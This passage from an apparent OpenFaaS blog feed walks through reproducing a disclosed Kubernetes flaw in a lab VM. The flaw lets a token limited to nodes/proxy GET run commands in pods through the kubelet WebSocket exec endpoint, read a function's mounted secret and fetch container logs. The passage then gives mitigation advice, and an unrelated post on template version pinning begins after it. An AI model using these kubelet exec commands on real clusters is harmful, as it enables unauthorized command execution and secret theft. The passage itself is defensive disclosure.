<p>We don’t have that problem. We’ll show you a quick way to spin up OpenFaaS with K3s in a microVM, like we’d do for a customer support request.</p>

<p>SlicerVM can also run autoscaling Kubernetes nodes, and can run HA across a number of VMs or physical hosts. You can find out more in the <a href="https://docs.slicervm.com/">Kubernetes section of the docs</a>.</p>

<h3 id="step-1-set-up-the-secrets">Step 1: Set up the secrets</h3>

<p>On a machine with Linux installed, and KVM available (bare-metal or nested virtualization), <a href="https://docs.slicervm.com/getting-started/install/">install Slicer</a>.</p>

<p>You can use a <a href="https://slicervm.com/pricing">commercial seat, or your Home Edition license</a>.</p>

<p>Create a working directory for the lab.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> k3s-rce
<span class="nb">cd </span>k3s-rce
</code></pre></div></div>

<p>Create a <code class="language-plaintext highlighter-rouge">.secrets/</code> folder with your OpenFaaS license. Slicer’s secret store syncs files securely into the VM via its guest agent over VSOCK—no need to expose secrets in userdata.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo mkdir</span> <span class="nt">-p</span> .secrets
<span class="nb">sudo chmod </span>700 .secrets

<span class="c"># Copy from your existing license location</span>
<span class="nb">sudo cp</span> ~/.openfaas/LICENSE .secrets/LICENSE
</code></pre></div></div>

<h3 id="step-2-create-the-userdata-script">Step 2: Create the userdata script</h3>

<p>Create <code class="language-plaintext highlighter-rouge">userdata.sh</code> to bootstrap K3s and OpenFaaS Pro:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="nb">set</span> <span class="nt">-ex</span>

<span class="nb">export </span><span class="nv">HOME</span><span class="o">=</span>/home/ubuntu
<span class="nb">export </span><span class="nv">USER</span><span class="o">=</span>ubuntu
<span class="nb">cd</span> /home/ubuntu/

<span class="o">(</span>
arkade update
arkade get kubectl helm faas-cli k3sup stern jq websocat <span class="nt">--path</span> /usr/local/bin
<span class="nb">chown</span> <span class="nv">$USER</span> /usr/local/bin/<span class="k">*</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> .kube
<span class="o">)</span>

<span class="o">(</span>
k3sup <span class="nb">install</span> <span class="nt">--local</span> <span class="nt">--k3s-extra-args</span> <span class="s1">'--disable traefik'</span>
<span class="nb">mv</span> ./kubeconfig ./.kube/config
<span class="nb">chown</span> <span class="nv">$USER</span> .kube/config
<span class="o">)</span>

<span class="nb">export </span><span class="nv">KUBECONFIG</span><span class="o">=</span>/home/ubuntu/.kube/config

<span class="c"># Block until ready</span>
k3sup ready <span class="nt">--kubeconfig</span> <span class="nv">$KUBECONFIG</span>

<span class="o">(</span>
kubectl apply <span class="nt">-f</span> https://raw.githubusercontent.com/openfaas/faas-netes/master/namespaces.yml

kubectl create secret generic <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  openfaas-license <span class="se">\</span>
  <span class="nt">--from-file</span><span class="o">=</span><span class="nv">license</span><span class="o">=</span>/run/slicer/secrets/LICENSE

helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade <span class="nt">--install</span> openfaas openfaas/openfaas <span class="se">\</span>
  <span class="nt">--namespace</span> openfaas <span class="se">\</span>
  <span class="nt">-f</span> https://raw.githubusercontent.com/openfaas/faas-netes/refs/heads/master/chart/openfaas/values-pro.yaml <span class="se">\</span>
  <span class="nt">--set</span> <span class="nv">clusterRole</span><span class="o">=</span><span class="nb">true

</span><span class="nv">PASSWORD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas basic-auth <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s2">"{.data.basic-auth-password}"</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$PASSWORD</span><span class="s2">"</span> <span class="o">&gt;</span> /home/ubuntu/.openfaas-password

<span class="nb">chown</span> <span class="nt">-R</span> <span class="nv">$USER</span> <span class="nv">$HOME</span>
<span class="nb">echo</span> <span class="s2">"export OPENFAAS_URL=http://127.0.0.1:31112"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="nb">echo</span> <span class="s2">"export KUBECONFIG=/home/ubuntu/.kube/config"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="nb">echo</span> <span class="s2">"cat /home/ubuntu/.openfaas-password | faas-cli login --password-stdin"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="o">)</span>
</code></pre></div></div>

<h3 id="step-3-generate-the-vm-config">Step 3: Generate the VM config</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>slicer new k3s-rce <span class="se">\</span>
  <span class="nt">--graceful-shutdown</span><span class="o">=</span><span class="nb">false</span> <span class="se">\</span>
  <span class="nt">--net</span><span class="o">=</span>isolated <span class="se">\</span>
  <span class="nt">--allow</span><span class="o">=</span>0.0.0.0/0 <span class="se">\</span>
  <span class="nt">--cpu</span><span class="o">=</span>2 <span class="se">\</span>
  <span class="nt">--ram</span><span class="o">=</span>4 <span class="se">\</span>
  <span class="nt">--userdata-file</span> ./userdata.sh <span class="se">\</span>
  <span class="o">&gt;</span> k3s-rce.yaml
</code></pre></div></div>

<p>Feel free to explore the YAML file to see what’s going on, you can edit it, or add additional settings via <code class="language-plaintext highlighter-rouge">slicer new --help</code>.</p>

<h3 id="step-4-start-the-vm">Step 4: Start the VM</h3>

<p>We tend to run Slicer in a tmux window, so we can detach and reconnect later.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tmux new <span class="nt">-s</span> slicer
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer up ./k3s-rce.yaml
</code></pre></div></div>

<p>On the first run, the base VM image will be downloaded and unpacked. It can take a few seconds to a minute or so, then new VM launches will be almost instant.</p>

<p>Then once booted, the userdata to set up K3s and wait for its readiness could also take a minute or two.</p>

<p>The following command will block until userdata has fully completed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer vm ready <span class="nt">--userdata</span>
</code></pre></div></div>

<h3 id="step-5-shell-into-the-vm">Step 5: Shell into the VM</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer vm shell <span class="nt">--uid</span> 1000

<span class="c"># Or give the VM name explicitly</span>
<span class="nb">sudo</span> <span class="nt">-E</span> slicer vm shell <span class="nt">--uid</span> 1000 k3s-rce-1
</code></pre></div></div>

<p>Once inside, verify OpenFaaS is running:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to Ubuntu 22.04.5 LTS <span class="o">(</span>GNU/Linux 5.10.240 x86_64<span class="o">)</span>
ubuntu@k3s-rce-1:~<span class="err">$</span>

kubectl get pods <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="step-6-extract-the-prometheus-service-account-token">Step 6: Extract the prometheus service account token</h3>

<p>The OpenFaaS prometheus deployment uses a service account with <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> for scraping metrics:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TOKEN</span><span class="o">=</span><span class="si">$(</span>kubectl create token openfaas-prometheus <span class="nt">-n</span> openfaas <span class="nt">--duration</span><span class="o">=</span>1h<span class="si">)</span>
<span class="nb">echo</span> <span class="nv">$TOKEN</span>
</code></pre></div></div>

<p>You’ll be presented with a JWT, you can copy and paste this into <a href="https://jwt.io">https://jwt.io</a> to look into the claims if you wish. It’s a standard JWT, so you can use any JWT decoder to view the claims.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"aud"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="s2">"https://kubernetes.default.svc.cluster.local"</span><span class="p">,</span><span class="w">
    </span><span class="s2">"k3s"</span><span class="w">
  </span><span class="p">],</span><span class="w">
  </span><span class="nl">"exp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769517043</span><span class="p">,</span><span class="w">
  </span><span class="nl">"iat"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769513443</span><span class="p">,</span><span class="w">
  </span><span class="nl">"iss"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://kubernetes.default.svc.cluster.local"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"jti"</span><span class="p">:</span><span class="w"> </span><span class="s2">"6f6c4370-ecda-4661-8ed0-803b6dc4ea64"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"kubernetes.io"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"namespace"</span><span class="p">:</span><span class="w"> </span><span class="s2">"openfaas"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"serviceaccount"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"openfaas-prometheus"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"uid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"593cba9a-8dd7-488b-96c0-d44bd5a6d703"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"nbf"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769513443</span><span class="p">,</span><span class="w">
  </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"system:serviceaccount:openfaas:openfaas-prometheus"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Verify the permissions:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl auth can-i <span class="nt">--list</span> <span class="nt">--as</span><span class="o">=</span>system:serviceaccount:openfaas:openfaas-prometheus | <span class="nb">grep </span>nodes

Resources      Non-Resource URLs     Resource Names   Verbs
nodes/proxy    <span class="o">[]</span>                    <span class="o">[]</span>               <span class="o">[</span>get list watch]
nodes          <span class="o">[]</span>                    <span class="o">[]</span>               <span class="o">[</span>get list watch]
</code></pre></div></div>

<p>The key permission here is <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>.</p>

<h3 id="step-7-discover-the-node-ip-and-pods">Step 7: Discover the node IP and pods</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">NODE_IP</span><span class="o">=</span><span class="si">$(</span>kubectl get nodes <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].status.addresses[?(@.type=="InternalIP")].address}'</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"Node IP: </span><span class="nv">$NODE_IP</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Pods:"</span>
curl <span class="nt">-sk</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="s2">"https://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/pods"</span> | jq <span class="nt">-r</span> <span class="s1">'.items[] | "\(.metadata.namespace)/\(.metadata.name)"'</span> | <span class="nb">head</span> <span class="nt">-10</span>

</code></pre></div></div>

<p>Example output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Node IP: 172.16.0.2

Pods:
kube-system/metrics-server-7b9c9c4b9c-79tn9
openfaas/autoscaler-5c9677bb4d-pxklm
openfaas/queue-worker-586c6c964b-fzvj9
openfaas/queue-worker-586c6c964b-lq6tf
openfaas/gateway-5596cbd757-f9kws
openfaas/prometheus-d9665fc79-vczwd
kube-system/coredns-7f496c8d7d-j6dsn
kube-system/local-path-provisioner-578895bd58-zhl9q
openfaas/nats-5cfd5b5bc8-mphfb
openfaas/queue-worker-586c6c964b-mvl9f
</code></pre></div></div>

<h3 id="step-8-execute-commands-via-websocket">Step 8: Execute commands via WebSocket</h3>

<p>Here’s the exploit. Despite only having <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>, we can exec into any pod.</p>

<p>Find a gateway pod, and then use the token to exec into it:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">POD</span><span class="o">=</span><span class="si">$(</span>kubectl get pods <span class="nt">-n</span> openfaas <span class="nt">-l</span> <span class="nv">app</span><span class="o">=</span>gateway <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].metadata.name}'</span><span class="si">)</span>

websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas/</span><span class="nv">$POD</span><span class="s2">/operator?output=1&amp;error=1&amp;command=id"</span>
</code></pre></div></div>

<p>Output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uid=100(app) gid=65533(nogroup) groups=65533(nogroup)
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>Now let’s create a secret for a function, deploy the function, then use the exec approach to obtain the contents of the secret.</p>

<p>This is a toy function that simply echos its hostname, it doesn’t consume the secret, but it is mounted into the function.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret create api-key <span class="nt">--from-literal</span><span class="o">=</span>secret-key

faas-cli deploy <span class="nt">--name</span> fn1 <span class="se">\</span>
  <span class="nt">--image</span> ghcr.io/openfaas/alpine:latest <span class="se">\</span>
  <span class="nt">--secret</span> api-key <span class="se">\</span>
  <span class="nt">--env</span> <span class="nv">fprocess</span><span class="o">=</span><span class="s2">"cat /etc/hostname"</span>

<span class="c"># Try out the function</span>

faas-cli invoke fn1 <span class="o">&lt;&lt;&lt;</span> <span class="s2">""</span>
fn1-dff95b7d8-zdncl
</code></pre></div></div>

<p>Now, get the Pod name for the function as before:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">POD</span><span class="o">=</span><span class="si">$(</span>kubectl get pods <span class="nt">-n</span> openfaas-fn <span class="nt">-l</span> <span class="nv">faas_function</span><span class="o">=</span>fn1 <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].metadata.name}'</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"Function Pod: </span><span class="nv">$POD</span><span class="s2">"</span>
</code></pre></div></div>

<p>Next, use <code class="language-plaintext highlighter-rouge">websocat</code> to exec into the function pod, and list, then obtain secrets at the standard mount path: <code class="language-plaintext highlighter-rouge">/var/openfaas/secrets</code>:</p>

<p>The example given by Helton only runs a single command without arguments, we need to extend it to specify a target file or directory by repeating <code class="language-plaintext highlighter-rouge">&amp;command=</code> for each additional argument.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?output=1&amp;error=1&amp;command=ls&amp;command=/var/openfaas/secrets"</span>
</code></pre></div></div>

<p>Output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>total 8
-rw-r--r-- 1 root root 4096 Jan 27 12:00 api-key
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>Now, obtain the secret contents:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?output=1&amp;error=1&amp;command=cat&amp;command=/var/openfaas/secrets/api-key"</span>
</code></pre></div></div>

<p>The output shows the contents of the secret:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secret-key
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>So, we’ve successfully executed commands in a Pod, and obtained the contents of a secret.</p>

<p>What might not be as obvious, is that the same node/proxy GET permission can be used to fetch container logs. In an ideal world, functions should not be logging sensitive data to stdout/stderr, however some teams may even consider the name of a function to be confidential information.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ubuntu@k3s-rce-1:~<span class="nv">$ </span>curl <span class="nt">-sk</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="s2">"https://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/containerLogs/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?tailLines=100&amp;timestamps=true"</span>

2026-01-27T11:42:58.759721814Z 2026/01/27 11:42:58 Version: 0.3.3	SHA: bf545828573185cd03ebc60254ba3d01d6bbcc5b
2026-01-27T11:42:58.760982598Z 2026/01/27 11:42:58 Timeouts: <span class="nb">read</span>: 30s write: 30s hard: 0s health: 30s.
2026-01-27T11:42:58.760992609Z 2026/01/27 11:42:58 Listening on port: 8080
2026-01-27T11:42:58.760995637Z 2026/01/27 11:42:58 Writing lock-file to: /tmp/.lock
2026-01-27T11:42:58.760997950Z 2026/01/27 11:42:58 Metrics listening on port: 8081
2026-01-27T11:43:01.643064545Z 2026/01/27 11:43:01 Forking fprocess.
2026-01-27T11:43:01.643729053Z 2026/01/27 11:43:01 Wrote 20 Bytes - Duration: 0.000705s
2026-01-27T12:48:13.897806818Z 2026/01/27 12:48:13 Forking fprocess.
2026-01-27T12:48:13.898409344Z 2026/01/27 12:48:13 Wrote 20 Bytes - Duration: 0.000573s
2026-01-27T12:48:15.076840450Z 2026/01/27 12:48:15 Forking fprocess.
2026-01-27T12:48:15.077518996Z 2026/01/27 12:48:15 Wrote 20 Bytes - Duration: 0.000736s
</code></pre></div></div>

<h2 id="what-weve-learned-from-this-exercise">What we’ve learned from this exercise</h2>

<h3 id="this-isnt-as-scary-as-it-sounds">This isn’t as scary as it sounds</h3>

<p>The dramatic headline of the disclosure makes this look catastrophic. In practice, a properly configured OpenFaaS deployment, and best practices for kubectl access neutralise the risk.</p>

<p><em>1. OpenFaaS for Enterprises has its own IAM system</em></p>

<p>No OpenFaaS IAM role grants access to Kubernetes service account tokens. Users interact via the OpenFaaS API/CLI, not via <code class="language-plaintext highlighter-rouge">kubectl</code>. The Prometheus service account is internal infrastructure, and is not accessible to users.</p>

<p>If you’re running OpenFaaS Standard, the same holds, however instead of using fine-grained IAM and user accounts, you’re likely using a single user account for administration. But that account is within OpenFaaS, not within Kubernetes.</p>

<p>We believe that end-users, who write, deploy and support functions can perform their duties without the need for <code class="language-plaintext highlighter-rouge">kubectl</code> access. The <code class="language-plaintext highlighter-rouge">faas-cli</code>, OpenFaaS Dashboard, and CLI/REST API provide all functionality required for users to manage their functions, and monitor their usage. Enterprise users can also <a href="https://docs.openfaas.com/openfaas-pro/iam/auditing/">enable auditing for the API</a>.</p>

<p>Ideally, only trusted staff within the DevOps or infrastructure teams should have <code class="language-plaintext highlighter-rouge">kubectl</code> access, aligned with best practices of least privilege and short-lived credentials.</p>

<p><em>2. Users should never have kubectl access in production</em></p>

<p>The ideal deployment pattern:</p>

<table>
  <thead>
    <tr>
      <th>Environment</th>
      <th>Access Model</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Local dev on your own machine</td>
      <td>Direct <code class="language-plaintext highlighter-rouge">kubectl</code> access to your own machine is fine, use non-production credentials</td>
    </tr>
    <tr>
      <td>Staging/shared clusters</td>
      <td>Grant only limited <code class="language-plaintext highlighter-rouge">kubectl</code> access, do not grant access to the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace</td>
    </tr>
    <tr>
      <td>Production</td>
      <td><strong>Time-limited <code class="language-plaintext highlighter-rouge">kubectl</code> access to SRE/DevOps team only</strong></td>
    </tr>
  </tbody>
</table>

<p>Typically, companies that are SOC2 or ISO 27001 compliant implement two roles. Development and deployment/operations. Development teams should not generally have access to the production cluster, but deploy via decoupled CI/CD pipelines or GitOps tools.</p>

<p><em>3. The service account requires network access to the Kubelet</em></p>

<p>You need to reach port 10250 on a node. In most production setups, this is firewalled or only accessible from within the cluster.</p>

<p><em>4. Metrics require this permission</em></p>

<p>The <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> permission exists because Prometheus (and similar tools) need to scrape <code class="language-plaintext highlighter-rouge">/metrics</code> and <code class="language-plaintext highlighter-rouge">/stats</code> endpoints from Kubelets. It’s required for the value proposition of monitoring. 67+ other cloud-native projects have the same requirement. OpenFaaS uses this data for monitoring, and for autoscaling on RAM/CPU usage.</p>

<h3 id="what-you-should-do">What you should do</h3>

<ol>
  <li><em>Don’t grant users kubectl access in production</em> - deployments should happen solely through GitOps tools or a CI/CD pipeline. Users should only have read-only “openfaas” IAM-based access via the OpenFaaS Dashboard, and no kubectl access of any form</li>
  <li><em>Network-segment the Kubelet API</em> - ensure port 10250 isn’t reachable from user workloads</li>
  <li><em>Use OpenFaaS IAM</em> - it provides function-level RBAC without exposing Kubernetes primitives</li>
  <li><em>Monitor for direct Kubelet access</em> - depending on your audit policy, you may see associated authorization checks (e.g. SubjectAccessReview events), even if the exec stream isn’t logged.</li>
</ol>

<h3 id="wrapping-up">Wrapping up</h3>

<p>This is a real quirk in Kubernetes RBAC—the fact that <code class="language-plaintext highlighter-rouge">GET</code> vs <code class="language-plaintext highlighter-rouge">CREATE</code> authorization depends on the transport protocol is surprising. Calling it “RCE” overstates the practical risk for well-architected deployments of OpenFaaS:</p>

<ul>
  <li>The affected service account is internal infrastructure</li>
  <li>Properly configured OpenFaaS users <em>should</em> never be able to interact with it directly</li>
  <li>Production is where real secrets are defined, and should use GitOps/CI deployments, not manual <code class="language-plaintext highlighter-rouge">kubectl</code> access</li>
</ul>

<p>We realise that you may have much more than OpenFaaS installed in your cluster, so now is the time to carefully review your security policies, and user access.</p>

<p>If you have any questions or concerns, get in touch with us directly via our support inbox.</p>

<p>See also:</p>

<ul>
  <li><a href="https://grahamhelton.com/blog/nodes-proxy-rce">Graham Helton’s full disclosure</a></li>
  <li><a href="https://labs.iximiuz.com/tutorials/nodes-proxy-rce-c9e436a9">Interactive lab on iximiuz</a></li>
  <li><a href="https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/2862-fine-grained-kubelet-authz/README.md">KEP-2862: Fine-Grained Kubelet API Authorization</a></li>
  <li><a href="https://slicervm.com">SlicerVM homepage</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="security" /><category term="kubernetes" /><category term="rce" /><summary type="html"><![CDATA[We spin up a Kubernetes cluster in record time to reproduce and address a security vulnerability in Kubernetes for OpenFaaS users.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-01-k8s-rce/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-01-k8s-rce/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing Template Version Pinning for Functions</title><link href="https://www.openfaas.com/blog/pinned-template-versions/" rel="alternate" type="text/html" title="Introducing Template Version Pinning for Functions" /><published>2025-11-19T00:00:00+00:00</published><updated>2025-11-19T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/pinned-template-versions</id><content type="html" xml:base="https://www.openfaas.com/blog/pinned-template-versions/"><![CDATA[<p>As of version <code class="language-plaintext highlighter-rouge">0.18.0</code> of the faas-cli, you can now pin templates to a specific version via the stack.yaml file for more reproducible builds and to avoid unexpected changes.</p>

<p><strong>Why pin a template?</strong></p>

<p>Pinning a version of a template, just like any other dependency can shield your functions from unexpected changes, and make it easier to test variations before rolling them out more broadly.</p>

<p>A template such as <code class="language-plaintext highlighter-rouge">golang-middleware</code> may change for any number of reasons, whether that’s the underlying Go version, the HTTP server that’s hidden from users, or even the base image used for runtime.</p>

<p>You may also be experimenting and change a template called <code class="language-plaintext highlighter-rouge">python3-http</code> from using an Alpine Linux base to using Debian. All your older functions that may rely on specific apk packages can remain on an older version of the template, until you’re ready to upgrade. Newer functions can use a newer version.</p>

<p>You may also need to enable certain logging or debug options, but don’t want to impact your existing functions. Creating a new named branch would mean you could switch out one or more functions to use that new version.</p>

<p><strong>How does it work?</strong></p>

<p>You can pin a template in three ways:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@1.0.0</code> - a release tag</li>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@inproc</code> - a branch name</li>
  <li><code class="language-plaintext highlighter-rouge">lang: golang-middleware@sha-af599e</code> - a specific commit hash prefixed with <code class="language-plaintext highlighter-rouge">sha-</code> with a short or long SHA format</li>
</ul>

<p>When specifying a release tag or branch name, an efficient shallow clone can be performed, however if you specify a SHA, a full clone of the repository is required to checkout that specific commit. A full clone could impact the performance of CI/CD pipelines if the repository is large or has a long history.</p>

<p>Finally, if you do not pin a version, then the latest version will be fetched from git whenever it is not available in the local <code class="language-plaintext highlighter-rouge">./template</code> folder.</p>

<blockquote>
  <p>Note: if you have added the <code class="language-plaintext highlighter-rouge">@</code> character into any of your custom template names, that will no longer be supported. So if you had written <code class="language-plaintext highlighter-rouge">node@22</code>, that should ideally be renamed to <code class="language-plaintext highlighter-rouge">node22</code> or <code class="language-plaintext highlighter-rouge">node-22</code> or similar.</p>
</blockquote>

<p>Whenever templates are expanded, a new <code class="language-plaintext highlighter-rouge">meta.json</code> file is written into each template’s folder. This file will make its way into the build of any function, so that you can understand which template and version was used to build a function image once it’s already been published.</p>

<p>For <code class="language-plaintext highlighter-rouge">golang-middleware@sha-2e6e262</code>, the following was written out:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"repository"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://github.com/openfaas/golang-http-template"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"ref_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha-2e6e262"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"sha"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2e6e262a724fc07d4eac75612c98a8870acf5606"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"written_at"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-11-13T18:20:02.109733766Z"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><strong>How do I fetch pinned templates?</strong></p>

<p>The first way, is to create a new template and specify the version in the <code class="language-plaintext highlighter-rouge">new</code> command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli new <span class="nt">--lang</span> golang-middleware@1.0.0 my-function
</code></pre></div></div>

<p>This will create a new function in the current directory, and use the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template at version <code class="language-plaintext highlighter-rouge">1.0.0</code>.</p>

<p>For existing functions, you can use the above <code class="language-plaintext highlighter-rouge">@</code> syntax and update the existing YAML:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  my-function:
<span class="gd">-   lang: golang-middleware
</span><span class="gi">+   lang: golang-middleware@1.0.0
</span></code></pre></div></div>

<p><strong>A note on the default templates repository</strong></p>

<p>There is a so called <em>default</em> templates repository that is used whenever you run <code class="language-plaintext highlighter-rouge">faas-cli template pull</code> without specifying a repository or language. We don’t think this makes much sense going forward, since both the Go and Python templates are now in different repositories.</p>

<p>If you want to explore the available templates, use the store commands instead:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli template store list
</code></pre></div></div>

<h2 id="so-should-you-start-pinning-template-versions-now">So should you start pinning template versions now?</h2>

<p>As a general rule of thumb, pinning versions of all assets you use from Docker base images, to npm packages, to Go modules, to Python packages, to any other dependency you use in your functions, setting a stable and known version of a template is an industry standard practice.</p>

<p>It’s not required, just as a Dockerfile can use a <code class="language-plaintext highlighter-rouge">:latest</code> tag, templates can be used without any version suffix. Without pinning, you’ll always get the latest version of the template including any fixes and updates to the base image, which will keep your CVE scanner happy. But at the same time, if an unexpected change breaks assumptions made by your functions, it could cause unexpected issues down the line.</p>

<p>To find the release of any template in the store, find its Git repository and visit the Releases page, find the latest release or SHA in the HEAD branch, and update your stack.yaml file to use that version.</p>

<p>For instance: <code class="language-plaintext highlighter-rouge">faas-cli template store describe python3-http</code> will show you the URL for the repository, where you can find the latest Release tag, or if there hasn’t been a release for a while, the latest SHA in the default branch (usually <code class="language-plaintext highlighter-rouge">master</code>).</p>

<h2 id="wrapping-up">Wrapping up</h2>

